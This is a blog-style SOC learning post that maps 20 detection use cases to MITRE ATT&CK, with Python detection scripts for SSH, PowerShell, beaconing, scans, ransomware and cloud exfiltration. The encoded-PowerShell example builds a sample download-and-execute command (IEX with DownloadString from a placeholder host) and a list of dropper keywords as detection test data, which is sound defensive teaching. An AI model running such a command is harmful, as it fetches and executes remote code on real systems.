I'm not the Xpert - SOC - 200 Use Cases Learning Resource for Cybersecurity Analysts! Part 1
TL;DR:
I'm starting these learning posts to give back. I have been in the IT industry for years and have leaned on many resources written by fellow practitioners, which helped me along my journey. I will leverage AI to generate the content, which eases the pain of hunting for information and helps me learn faster than working through hundreds of hours of training and blogs.
In this post, I aim to bring Izzmier Izzuddin Zulkepli's work to life with an extra layer of accessibility and learning potential by integrating GenAI capabilities. For every one of the 200 must-know use cases for cybersecurity analysts, I've linked it to the MITRE ATT&CK framework, a catalogue of adversary tactics, techniques, and procedures (TTPs) that underpins modern detection engineering.
By doing so, I hope to make it easier for cybersecurity professionals, whether you're an L1 just starting out or an experienced L2 or L3 analyst, to better understand how these use cases connect to real-world adversary behaviour. This mapping also provides an opportunity to access curated learning resources, accelerating your ability to master each use case without wading through mountains of content.
What You’ll Find in This Resource:
Actionable Use Cases: Each of the 200 use cases has been categorized and explained in detail, making them easy to reference during day-to-day operations or incident response.
MITRE ATT&CK Integration: Each use case is mapped to specific ATT&CK techniques, offering a structured way to understand adversarial behaviour.
Learning Resources: I’ve leveraged AI to generate summaries, link relevant blogs, courses, and documentation, and even include short AI-powered explainers where applicable.
Why This Matters:
In cybersecurity, context is king. The SOC environment is fast-paced, and analysts don’t always have the time to piece together how a particular alert or scenario ties back to a broader attack strategy. This resource gives you an all-in-one guide to deepen your knowledge and improve your analysis capabilities.
Example Use Case:
Let me give you a quick example of how this works:
Use Case #45: Detect Unauthorized Access to Cloud Resources
MITRE ATT&CK Techniques: T1078 (Valid Accounts), T1078.004 (Valid Accounts: Cloud Accounts)
Description: This use case identifies unauthorized access or privilege escalation patterns in cloud environments such as AWS or Azure, for example console sign-ins from unfamiliar locations or role assumptions by identities that do not normally use them.
Learning Resource: Links to AWS CloudTrail and Azure Monitor logs setup guides, a YouTube video explaining cloud security fundamentals, and a curated list of labs on platforms like TryHackMe or Hack The Box.
Collaboration and Feedback:
This post is not the end-all-be-all but a starting point. I welcome the community's feedback, additions, and suggestions to make this resource as comprehensive and helpful as possible.
I’ll share the first 20 use cases in this post and release more in the coming weeks. If you’re passionate about learning, cybersecurity, and giving back, let’s connect and collaborate to make the journey more manageable for the next wave of professionals.
1. Detection of Abnormal Device Enrollment in MDM
MITRE Tactic: Initial Access
Technique ID: T1078
Technique Name: Valid Accounts
Steps: Monitor MDM enrollment logs. Flag enrollments from devices not in the asset inventory or from unexpected users or locations. Alert and block or quarantine the device.
Key Insight: Protects against rogue devices infiltrating corporate networks.
Resource: https://attack.mitre.org/techniques/T1078/
2. Detection of Unauthorized SSH Access to Cloud Instances
MITRE Tactic: Initial Access
Technique ID: T1078
Technique Name: Valid Accounts
Steps: Monitor SSH authentication logs (sshd entries in auth.log or journald) for accepted logins from IPs outside approved ranges and for bursts of failed attempts. Correlate with user activity. Alert and terminate unauthorized sessions.
Key Insight: Prevents unauthorized access to cloud instances. When the SSH access is between already-compromised hosts, it maps to T1021.004 (Remote Services: SSH) under Lateral Movement.
Resource: https://attack.mitre.org/techniques/T1078/
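Here is an added example, in Python, of what the steps above look like as detection logic. It is not part of Izzmier's list or of this post's original content. The sshd log lines are constructed, and the approved range 10.20.0.0/24 and the failure threshold of five are assumptions you would replace with your own bastion or VPN ranges and tuning.

```python
import ipaddress
import re
from collections import Counter

# Constructed sample of OpenSSH auth.log lines for the example (not real telemetry).
SAMPLE_AUTH_LOG = """\
Jan 14 09:12:01 web-01 sshd[2211]: Accepted publickey for deploy from 10.20.0.15 port 51522 ssh2: ED25519 SHA256:aaaa
Jan 14 09:13:44 web-01 sshd[2234]: Failed password for root from 203.0.113.77 port 40122 ssh2
Jan 14 09:13:46 web-01 sshd[2234]: Failed password for root from 203.0.113.77 port 40124 ssh2
Jan 14 09:13:49 web-01 sshd[2240]: Failed password for invalid user admin from 203.0.113.77 port 40130 ssh2
Jan 14 09:13:51 web-01 sshd[2240]: Failed password for invalid user admin from 203.0.113.77 port 40131 ssh2
Jan 14 09:13:53 web-01 sshd[2241]: Failed password for invalid user admin from 203.0.113.77 port 40133 ssh2
Jan 14 09:14:02 web-01 sshd[2250]: Accepted password for ubuntu from 198.51.100.9 port 33002 ssh2
Jan 14 09:20:17 web-01 sshd[2301]: Accepted publickey for deploy from 10.20.0.16 port 51530 ssh2: ED25519 SHA256:bbbb
"""

# Assumed allowlist: the bastion/VPN range from which interactive SSH is expected.
APPROVED_SOURCES = [ipaddress.ip_network("10.20.0.0/24")]
FAILED_THRESHOLD = 5  # assumed tuning value; adjust to your environment

LINE_RE = re.compile(
    r"sshd\[\d+\]: (?P<result>Accepted|Failed) (?P<method>\S+) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) port \d+"
)


def parse_sshd(log_text):
    """Extract result, auth method, user and source IP from each sshd auth line."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if m:
            events.append(m.groupdict())
    return events


def is_approved(ip_str):
    """True if the source address falls inside an approved network."""
    ip = ipaddress.ip_address(ip_str)
    return any(ip in net for net in APPROVED_SOURCES)


def detect_ssh_anomalies(log_text):
    """Alerts for successful logins from unapproved sources and for brute-force bursts."""
    events = parse_sshd(log_text)
    alerts = []
    for e in events:
        if e["result"] == "Accepted" and not is_approved(e["ip"]):
            alerts.append({
                "type": "accepted_from_unapproved_source",
                "user": e["user"], "ip": e["ip"], "method": e["method"],
            })
    # Count failures per source; the method field tells you whether it was a password spray.
    failures = Counter(e["ip"] for e in events if e["result"] == "Failed")
    for ip, count in failures.items():
        if count >= FAILED_THRESHOLD:
            alerts.append({"type": "brute_force_suspected", "ip": ip, "count": count})
    return alerts


if __name__ == "__main__":
    for alert in detect_ssh_anomalies(SAMPLE_AUTH_LOG):
        print(alert)
```

The accepted-from-unapproved-source alert carries the auth method, so an analyst sees at a glance that the login used a password rather than a key, which is a second finding worth raising with the instance owner.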
3. Detection of SQL Injection Attacks
MITRE Tactic: Initial Access
Technique ID: T1190
Technique Name: Exploit Public-Facing Application
Steps: Monitor web server and WAF logs for SQL injection payloads (quote-and-comment sequences, UNION SELECT, time-based delay functions). Enrich source IPs with threat intelligence. Alert and block malicious traffic.
Key Insight: Protects web applications from database exploitation attempts.
Resource: https://attack.mitre.org/techniques/T1190/
4. Detection of Phishing URLs in Emails
MITRE Tactic: Initial Access
Technique ID: T1566
Technique Name: Phishing
Steps: Analyze email content for URLs matching threat-intelligence feeds, newly registered domains or look-alike domains. Quarantine suspicious emails. Alert users and administrators.
Key Insight: Defends against credential theft through phishing emails.
Resource: https://attack.mitre.org/techniques/T1566/
5. Detection of Unauthorized Script Execution
MITRE Tactic: Execution
Technique ID: T1059
Technique Name: Command and Scripting Interpreter
Steps: Monitor script interpreter execution (PowerShell, bash, Python, wscript) through process-creation and script-block logs. Detect executions from unapproved paths or by unexpected parent processes. Alert and isolate affected systems.
Key Insight: Identifies and prevents malicious script activities.
Resource: https://attack.mitre.org/techniques/T1059/
6. Detection of Encoded PowerShell Commands
MITRE Tactic: Execution
Technique ID: T1059.001
Technique Name: PowerShell
Steps: Monitor process-creation and PowerShell script-block logs (Windows Event IDs 4688 and 4104) for -EncodedCommand and its short forms followed by a Base64 blob. Decode and inspect the payload. Correlate with system activity. Alert and investigate suspicious patterns.
Key Insight: Detects obfuscated malicious activities in PowerShell.
Resource: https://attack.mitre.org/techniques/T1059/001/
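To show the decode-and-inspect step concretely, here is an added Python example that is not part of the original list or this post's own content. The command lines are constructed to resemble what Windows Security event 4688 or Sysmon event 1 records; the 198.51.100.7 address is a documentation range, and the token list is a starting point, not a complete signature set.

```python
import base64
import re

# PowerShell accepts any unambiguous prefix of -EncodedCommand; attackers favour the
# short forms. The blob must be Base64 of UTF-16LE text, which is what we decode.
ENC_FLAG_RE = re.compile(r"(?i)(?:^|\s)-e(?:c|n|nc|ncoded|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})")
HIDDEN_RE = re.compile(r"(?i)\s-w(?:indowstyle)?\s+hidden")

# Tokens that rarely appear in administrative scripts but are common in droppers.
SUSPICIOUS_TOKENS = (
    "iex", "invoke-expression", "downloadstring", "downloadfile", "net.webclient",
    "invoke-webrequest", "frombase64string", "reflection.assembly", "start-bitstransfer",
)


def encode_ps(command):
    """Produce the -EncodedCommand form of a command, exactly as PowerShell expects it."""
    return base64.b64encode(command.encode("utf-16le")).decode("ascii")


# Constructed sample command lines (not real telemetry).
SAMPLE_COMMAND_LINES = [
    r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1",
    "powershell.exe -nop -w hidden -enc "
    + encode_ps("IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')"),
    "powershell.exe -EncodedCommand " + encode_ps("Get-Date"),
    'pwsh -c "Get-Process | Where-Object CPU -gt 100"',
]


def decode_encoded_command(cmdline):
    """Decoded payload if the command line carries a valid -EncodedCommand blob, else None."""
    m = ENC_FLAG_RE.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
        return raw.decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        # Base64-looking argument that is not a PowerShell payload (bad alphabet, padding or odd length)
        return None


def analyze_command_line(cmdline):
    """Classify a process command line: not encoded, encoded but benign-looking, or alert."""
    decoded = decode_encoded_command(cmdline)
    if decoded is None:
        return {"encoded": False, "decoded": None, "hits": [], "verdict": "not_encoded"}
    lowered = decoded.lower()
    hits = [tok for tok in SUSPICIOUS_TOKENS if tok in lowered]
    hidden = bool(HIDDEN_RE.search(cmdline))
    if hits:
        verdict = "alert"        # download-and-execute pattern inside the encoded payload
    elif hidden:
        verdict = "suspicious"   # encoded plus hidden window, but no known-bad token yet
    else:
        verdict = "review"       # encoding alone is used by some admins and management tools
    return {"encoded": True, "decoded": decoded, "hits": hits, "verdict": verdict}


if __name__ == "__main__":
    for line in SAMPLE_COMMAND_LINES:
        print(analyze_command_line(line))
```

The point of the three-way verdict is the caveat in the use case: encoding by itself is not evidence of compromise, so the decoded content, not the presence of -enc, should drive the alert.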
7. Detection of Suspicious Browser Extensions
MITRE Tactic: Persistence
Technique ID: T1176
Technique Name: Browser Extensions (listed as sub-technique T1176.001 under Software Extensions in current ATT&CK versions)
Steps: Monitor browser extension installations through browser management policies and endpoint telemetry. Detect extensions that are not on the approved list or that request broad permissions such as reading all site data. Alert and remove risky extensions.
Key Insight: Prevents malicious browser extensions from harvesting credentials and session data.
Resource: https://attack.mitre.org/techniques/T1176/
8. Detection of Unauthorized Remote Access Tools
MITRE Tactic: Command and Control
Technique ID: T1219
Technique Name: Remote Access Software
Steps: Monitor software installations and process execution for remote access tools. Detect tools not on the approved list (for example AnyDesk or TeamViewer where they are not sanctioned) and their outbound connections. Alert and block.
Key Insight: Stops attackers from keeping interactive remote control of hosts through legitimate-looking tools.
Resource: https://attack.mitre.org/techniques/T1219/
9. Detection of Exploit Attempts on Web Servers
MITRE Tactic: Initial Access
Technique ID: T1190
Technique Name: Exploit Public-Facing Application
Steps: Monitor traffic for exploit patterns targeting web servers. Block malicious IPs. Alert and investigate.
Key Insight: Protects against web server vulnerabilities being exploited.
Resource: https://attack.mitre.org/techniques/T1190/
10. Detection of Unauthorized RDP Sessions
MITRE Tactic: Lateral Movement
Technique ID: T1021.001
Technique Name: Remote Services: Remote Desktop Protocol
Steps: Monitor RDP session logs (Windows Event ID 4624 with logon type 10, 4778/4779 session reconnect and disconnect, and TerminalServices-RemoteConnectionManager event 1149). Detect logins from unapproved users or source hosts. Alert and block unauthorized access.
Key Insight: Prevents attackers from accessing internal systems via RDP.
Resource: https://attack.mitre.org/techniques/T1021/001/
11. Detection of Suspicious Keylogging Tools
MITRE Tactic: Credential Access
Technique ID: T1056.001
Technique Name: Input Capture: Keylogging
Steps: Monitor processes that install keyboard hooks or poll input devices. Detect unauthorized tools. Alert and isolate systems.
Key Insight: Safeguards credentials from being stolen through keylogging.
Resource: https://attack.mitre.org/techniques/T1056/001/
12. Detection of Network Enumeration Activities
MITRE Tactic: Discovery
Technique ID: T1016
Technique Name: System Network Configuration Discovery
Steps: Monitor process-creation logs for built-in network configuration and routing commands. Detect usage by unexpected users, from unusual parent processes or in bursts. Alert and investigate reconnaissance attempts.
Key Insight: Surfaces reconnaissance before it turns into lateral movement.
Resource: https://attack.mitre.org/techniques/T1016/
13. Detection of Suspicious Log Deletions
MITRE Tactic: Defense Evasion
Technique ID: T1070.001 / T1070.002
Technique Name: Indicator Removal: Clear Windows Event Logs / Clear Linux or Mac System Logs
Steps: Detect log clearing commands (wevtutil cl, Clear-EventLog, truncation or deletion of files under /var/log) and the "audit log was cleared" event (Windows Event ID 1102). Analyze repetitive patterns of log deletion. Alert and investigate.
Key Insight: Identifies attempts to cover tracks by clearing logs; forwarding logs off-host as they are written is what keeps the evidence when the attacker succeeds.
Resource: https://attack.mitre.org/techniques/T1070/001/ and https://attack.mitre.org/techniques/T1070/002/
14. Detection of Suspicious HTTP Traffic
MITRE Tactic: Command and Control
Technique ID: T1071.001
Technique Name: Application Layer Protocol: Web Protocols
Steps: Monitor proxy and HTTP logs for anomalies: rare or outdated user-agent strings, connections to the same destination at near-constant intervals (beaconing), and unusual URI patterns. Alert and block suspicious connections.
Key Insight: Identifies malware communications using HTTP.
Resource: https://attack.mitre.org/techniques/T1071/001/
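The two signals named above, user-agent rarity and regular check-in intervals, are easy to compute once you have proxy logs grouped per host. The following Python is an added example and not part of the original list; the proxy records, hostnames under the reserved .example domain and the thresholds (six events, coefficient of variation at most 0.15) are constructed for the demonstration.

```python
import statistics
from collections import defaultdict
from datetime import datetime

# User-agent strings used in the constructed sample.
CHROME_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/120.0 Safari/537.36"
LEGACY_UA = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"  # stale UA hard-coded in many implants

# Constructed proxy log: (timestamp, source host, destination host, user agent). Not real traffic.
SAMPLE_PROXY_LOG = [
    ("2025-01-14T10:00:00", "ws-042", "cdn-update.example", LEGACY_UA),
    ("2025-01-14T10:00:05", "ws-017", "news.example", CHROME_UA),
    ("2025-01-14T10:00:07", "ws-017", "news.example", CHROME_UA),
    ("2025-01-14T10:00:30", "ws-017", "news.example", CHROME_UA),
    ("2025-01-14T10:01:01", "ws-042", "cdn-update.example", LEGACY_UA),
    ("2025-01-14T10:01:59", "ws-042", "cdn-update.example", LEGACY_UA),
    ("2025-01-14T10:02:10", "ws-023", "mail.example", CHROME_UA),
    ("2025-01-14T10:03:00", "ws-042", "cdn-update.example", LEGACY_UA),
    ("2025-01-14T10:04:02", "ws-042", "cdn-update.example", LEGACY_UA),
    ("2025-01-14T10:04:58", "ws-042", "cdn-update.example", LEGACY_UA),
    ("2025-01-14T10:05:12", "ws-017", "news.example", CHROME_UA),
    ("2025-01-14T10:05:13", "ws-017", "news.example", CHROME_UA),
    ("2025-01-14T10:06:00", "ws-042", "cdn-update.example", LEGACY_UA),
    ("2025-01-14T10:07:01", "ws-042", "cdn-update.example", LEGACY_UA),
    ("2025-01-14T10:12:40", "ws-017", "news.example", CHROME_UA),
]


def _ts(value):
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%S")


def rare_user_agents(events, max_hosts=1):
    """User agents seen on no more than max_hosts distinct sources; fleet-wide rarity is the signal."""
    hosts_by_ua = defaultdict(set)
    for _, src, _, ua in events:
        hosts_by_ua[ua].add(src)
    return {ua: sorted(hosts) for ua, hosts in hosts_by_ua.items() if len(hosts) <= max_hosts}


def beacon_candidates(events, min_events=6, max_cv=0.15):
    """(src, dst) pairs whose inter-request intervals are nearly constant.

    Human browsing is bursty (large coefficient of variation); an implant checking in
    on a timer with small jitter has a CV close to zero.
    """
    times = defaultdict(list)
    for ts, src, dst, _ in events:
        times[(src, dst)].append(_ts(ts))
    results = []
    for (src, dst), stamps in times.items():
        if len(stamps) < min_events:
            continue
        stamps.sort()
        deltas = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        mean = statistics.mean(deltas)
        if mean <= 0:
            continue  # duplicate timestamps only; nothing to measure
        cv = statistics.pstdev(deltas) / mean
        if cv <= max_cv:
            results.append({"src": src, "dst": dst, "events": len(stamps),
                            "interval_s": round(mean, 1), "cv": round(cv, 3)})
    return results


if __name__ == "__main__":
    print(rare_user_agents(SAMPLE_PROXY_LOG))
    print(beacon_candidates(SAMPLE_PROXY_LOG))
```

Run both checks and intersect the results: a host that is the only one presenting a given user agent and is also talking to one destination on a fixed cadence is a much stronger lead than either finding alone.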
15. Detection of Unauthorized Network Scans
MITRE Tactic: Discovery
Technique ID: T1046
Technique Name: Network Service Discovery
Steps: Analyze traffic for scanning patterns. Detect unauthorized port sweeps. Alert and block malicious traffic.
Key Insight: Prevents attackers from mapping the network.
Resource: https://attack.mitre.org/techniques/T1046/
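Scanning shows up in firewall or flow logs as one source touching many ports on one host (a port scan) or one port across many hosts (a sweep) in a short window. The Python below is an added example rather than anything from the original list; the log format, the 60-second bucket and the threshold of eight are assumptions, and the addresses are documentation or private ranges.

```python
import re
from collections import defaultdict
from datetime import datetime

# Generic firewall-style line: timestamp, 5-tuple fragments and the verdict (constructed format).
LOG_RE = re.compile(
    r"^(?P<ts>\S+) SRC=(?P<src>\S+) DST=(?P<dst>\S+) PROTO=(?P<proto>\S+) "
    r"DPT=(?P<dpt>\d+) ACTION=(?P<action>\S+)$"
)
EPOCH = datetime(1970, 1, 1)


def _constructed_sample():
    """Constructed firewall log for the example (not real traffic)."""
    lines = []
    # Vertical scan: one external source probing ten ports on one host within twelve seconds.
    for i, port in enumerate([21, 22, 23, 25, 80, 110, 143, 443, 445, 3389]):
        lines.append(f"2025-01-14T10:00:{i + 1:02d} SRC=203.0.113.5 DST=10.0.0.10 PROTO=TCP DPT={port} ACTION=DENY")
    # Horizontal sweep: an internal host trying SMB against nine neighbours.
    for i in range(9):
        lines.append(f"2025-01-14T10:00:{20 + i:02d} SRC=10.0.0.51 DST=10.0.0.{20 + i} PROTO=TCP DPT=445 ACTION=DENY")
    # Benign: repeated HTTPS from one client to one server.
    for i in range(5):
        lines.append(f"2025-01-14T10:00:{30 + i:02d} SRC=10.0.0.50 DST=10.0.0.10 PROTO=TCP DPT=443 ACTION=ALLOW")
    return lines


SAMPLE_FIREWALL_LOG = _constructed_sample()


def parse_firewall(lines):
    """Parse lines into dicts with an added 'seconds' field for bucketing."""
    events = []
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            e = m.groupdict()
            e["seconds"] = (datetime.strptime(e["ts"], "%Y-%m-%dT%H:%M:%S") - EPOCH).total_seconds()
            e["dpt"] = int(e["dpt"])
            events.append(e)
    return events


def detect_scans(lines, window_s=60, port_threshold=8, host_threshold=8):
    """Flag sources touching many ports on one host, or one port on many hosts, within a time bucket.

    Buckets are fixed windows, so a scan straddling a boundary is split across two buckets;
    lower the thresholds or move to a sliding window if slow scanners matter in your environment.
    """
    ports_seen = defaultdict(set)   # (src, dst, bucket) -> distinct destination ports
    hosts_seen = defaultdict(set)   # (src, dpt, bucket) -> distinct destination hosts
    for e in parse_firewall(lines):
        bucket = int(e["seconds"] // window_s)
        ports_seen[(e["src"], e["dst"], bucket)].add(e["dpt"])
        hosts_seen[(e["src"], e["dpt"], bucket)].add(e["dst"])
    alerts = []
    for (src, dst, _), ports in ports_seen.items():
        if len(ports) >= port_threshold:
            alerts.append({"type": "port_scan", "src": src, "dst": dst, "ports": len(ports)})
    for (src, dpt, _), hosts in hosts_seen.items():
        if len(hosts) >= host_threshold:
            alerts.append({"type": "host_sweep", "src": src, "dpt": dpt, "hosts": len(hosts)})
    return alerts


if __name__ == "__main__":
    for alert in detect_scans(SAMPLE_FIREWALL_LOG):
        print(alert)
```

Note that the sweep in the sample comes from an internal address: a workstation walking port 445 across its subnet is lateral-movement reconnaissance, and it deserves a higher priority than the external scan that perimeter filtering already denied.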
16. Detection of Unauthorized File Modifications
MITRE Tactic: Impact
Technique ID: T1485
Technique Name: Data Destruction
Steps: Monitor file integrity (FIM) logs for unexpected changes or deletions of critical files. Alert and investigate.
Key Insight: Protects critical files from tampering. Deletions map to T1485, while modification of stored data maps to T1565.001 (Stored Data Manipulation).
Resource: https://attack.mitre.org/techniques/T1485/
17. Detection of Suspicious FTP Transfers
MITRE Tactic: Exfiltration
Technique ID: T1048.003
Technique Name: Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol
Steps: Monitor FTP activity for large or unusual file transfers. Block transfers to unknown servers. Alert administrators.
Key Insight: Prevents sensitive data leaks over FTP.
Resource: https://attack.mitre.org/techniques/T1048/003/
18. Detection of Unauthorized Cron Jobs
MITRE Tactic: Execution, Persistence, Privilege Escalation
Technique ID: T1053.003
Technique Name: Scheduled Task/Job: Cron
Steps: Monitor changes to user crontabs and the /etc/cron.* directories, and review cron execution logs. Detect unauthorized entries, especially ones that fetch remote content and pipe it to a shell. Alert and remove.
Key Insight: Prevents attackers from maintaining persistence via cron jobs.
Resource: https://attack.mitre.org/techniques/T1053/003/
19. Detection of Suspicious File Encryption
MITRE Tactic: Impact
Technique ID: T1486
Technique Name: Data Encrypted for Impact
Steps: Monitor file encryption patterns. Detect unusual spikes in activity. Alert and isolate systems.
Key Insight: Detects ransomware encryption activities.
Resource: https://attack.mitre.org/techniques/T1486/
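"Monitor file encryption patterns" in practice means two things: the bytes being written look random, and one process is doing it to many files very quickly. The Python below is an added example, not part of Izzmier's list or the original post, and every write event in it is constructed; the 60-second window, five-file minimum and 7.5 bits-per-byte entropy threshold are assumptions to tune against your own file-server telemetry.

```python
import math
from collections import Counter, defaultdict


def shannon_entropy(data):
    """Bits per byte: plaintext sits around 4 to 5, compressed or encrypted content near 8."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


# Constructed content samples: office-like text, and a uniform byte distribution standing in for ciphertext.
PLAINTEXT = b"Quarterly report: revenue grew 4% quarter over quarter; see appendix B. " * 30
CIPHERTEXT_LIKE = bytes(range(256)) * 8   # every byte value equally frequent -> entropy exactly 8.0

# Constructed file-write events: (seconds, writing process, path, first bytes written). Not real telemetry.
SAMPLE_WRITES = [
    (0, "winword.exe", r"C:\Users\ana\Docs\q1.docx", PLAINTEXT),
    (5, "explorer.exe", r"C:\Users\ana\Downloads\photos.zip", CIPHERTEXT_LIKE),  # benign archive, also high entropy
    (40, "svchst.exe", r"C:\Users\ana\Docs\q1.docx.locked", CIPHERTEXT_LIKE),
    (41, "svchst.exe", r"C:\Users\ana\Docs\q2.docx.locked", CIPHERTEXT_LIKE),
    (41, "svchst.exe", r"C:\Users\ana\Docs\budget.xlsx.locked", CIPHERTEXT_LIKE),
    (42, "svchst.exe", r"C:\Users\ana\Docs\plan.pptx.locked", CIPHERTEXT_LIKE),
    (43, "svchst.exe", r"C:\Users\ana\Pictures\team.jpg.locked", CIPHERTEXT_LIKE),
    (44, "svchst.exe", r"C:\Users\ana\Docs\notes.txt.locked", CIPHERTEXT_LIKE),
    (50, "winword.exe", r"C:\Users\ana\Docs\q3.docx", PLAINTEXT),
]


def _extension(path):
    """Last extension of a Windows or POSIX path, lower-cased; empty if none."""
    name = path.replace("\\", "/").rsplit("/", 1)[-1]
    return name.rsplit(".", 1)[-1].lower() if "." in name else ""


def detect_encryption_burst(events, window_s=60, min_files=5, entropy_threshold=7.5):
    """One alert per process that writes at least min_files high-entropy files inside window_s.

    Entropy alone is not enough (archives and media are high-entropy too); the burst rate per
    process and a common new extension are what separate ransomware from a download.
    """
    high = defaultdict(list)
    for seconds, proc, path, sample in events:
        if shannon_entropy(sample) >= entropy_threshold:
            high[proc].append((seconds, path))
    alerts = []
    for proc, writes in high.items():
        writes.sort()
        for i in range(len(writes)):
            j = i
            while j < len(writes) and writes[j][0] - writes[i][0] <= window_s:
                j += 1
            if j - i >= min_files:
                exts = Counter(_extension(p) for _, p in writes[i:j])
                ext, share = exts.most_common(1)[0]
                alerts.append({"process": proc, "files": j - i, "window_start": writes[i][0],
                               "common_extension": ext, "extension_share": round(share / (j - i), 2)})
                break   # one alert per process is enough to trigger isolation
    return alerts


if __name__ == "__main__":
    for alert in detect_encryption_burst(SAMPLE_WRITES):
        print(alert)
```

The archive written by explorer.exe has the same entropy as the encrypted documents but never triggers, because a single high-entropy write is normal; six of them from one process in four seconds, all ending in the same new extension, is not.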
20. Detection of Large Data Transfers to Cloud
MITRE Tactic: Exfiltration
Technique ID: T1567.002
Technique Name: Exfiltration Over Web Service: Exfiltration to Cloud Storage
Steps: Monitor upload sizes to cloud storage. Detect unusual spikes in transfer activity. Block unauthorized transfers and alert administrators.
Key Insight: Prevents data exfiltration through cloud applications.
Resource: https://attack.mitre.org/techniques/T1567/002/
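"Detect unusual spikes in transfer activity" needs a per-user baseline, and the same logic serves use case 17 (large FTP transfers) as well as this one. The Python below is an added example rather than content from the original list: the daily upload volumes are constructed, and the 14-day history, robust z-score threshold of 3.5 and 1000 MB absolute floor are assumptions you would tune to your own tenant.

```python
import statistics

# Constructed per-user daily upload volumes in MB for the previous 14 days (not real data).
HISTORY_MB = {
    "alice": [52, 61, 48, 70, 55, 66, 49, 58, 63, 51, 57, 60, 54, 62],
    "bob":   [10] * 14,   # perfectly flat baseline: MAD is zero, so a z-score is undefined
    "dave":  [2050, 1980, 2120, 2000, 2200, 2090, 1950, 2010, 2150, 2040, 1990, 2110, 2070, 2030],
}
TODAY_MB = {"alice": 4200, "bob": 12, "dave": 2130}


def robust_zscore(history, value):
    """Median/MAD z-score: unlike mean/stdev it is not dragged upward by one earlier spike.

    Returns None when the baseline is flat (MAD == 0) so the caller can fall back to a
    simple comparison against the median instead of dividing by zero.
    """
    med = statistics.median(history)
    mad = statistics.median([abs(x - med) for x in history])
    if mad == 0:
        return None
    return 0.6745 * (value - med) / mad   # 0.6745 scales MAD to a standard deviation equivalent


def detect_upload_anomalies(history_by_user, today_by_user, z_threshold=3.5, min_mb=1000, min_days=7):
    """Alert when today's volume is both statistically unusual for the user and large in absolute terms."""
    alerts = []
    for user, today in today_by_user.items():
        if today < min_mb:
            continue   # absolute floor keeps tiny-but-unusual days from paging anyone
        hist = history_by_user.get(user, [])
        if len(hist) < min_days:
            alerts.append({"user": user, "today_mb": today, "reason": "no_baseline"})
            continue
        med = statistics.median(hist)
        z = robust_zscore(hist, today)
        flat_spike = z is None and today > med
        if flat_spike or (z is not None and z >= z_threshold):
            alerts.append({"user": user, "today_mb": today, "median_mb": med,
                           "robust_z": None if z is None else round(z, 1), "reason": "volume_spike"})
    return alerts


if __name__ == "__main__":
    for alert in detect_upload_anomalies(HISTORY_MB, TODAY_MB):
        print(alert)
```

In the sample, dave moves two gigabytes a day and stays quiet because that is normal for him, while alice's 4.2 GB is flagged against a 57.5 MB median; a fixed fleet-wide byte threshold would have produced the opposite result.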
Conclusion
The journey to mastering cybersecurity is never-ending, but having actionable resources makes all the difference. These 200 must-know use cases aim to bridge the gap between understanding and applying cybersecurity tactics in your daily SOC operations.
Next Steps:
You can save this resource and explore the mapped MITRE ATT&CK tactics.
Share your feedback in the comments to help improve and expand this effort.
Spread the knowledge—share this with your team and peers.
What’s Coming Next: In the next post, I’ll share 20 more use cases, complete with MITRE ATT&CK mappings and practical learning resources. Follow me for updates, and let’s grow together as a community!
#CyberSecurity #SOC #ThreatDetection #CyberThreats #MITREATTACK #InfoSec #IncidentResponse #NetworkSecurity #CyberSecurityAnalyst #DataProtection #Tech #ArtificialIntelligence #GenAI #AIinCyberSecurity #ITInfrastructure #CloudSecurity #DigitalTransformation #Technology #CyberSecurityCommunity #LearningTogether #KnowledgeSharing #ProfessionalDevelopment #TeamWork #ContinuousLearning #Innovation #FutureOfWork #IT